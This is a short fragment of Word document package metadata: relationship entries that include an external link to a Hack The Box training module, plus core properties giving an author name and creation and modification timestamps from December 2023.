  <w15:docId w15:val="{4B9B328E-3327-4E48-81B9-077343D370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y.hackthebox.com/module/details/145" TargetMode="External" Id="Recef7225f0994b2c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R984e51ef064943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2023-12-14T11:32:53.8171432Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-14T11:33:05.4192029Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>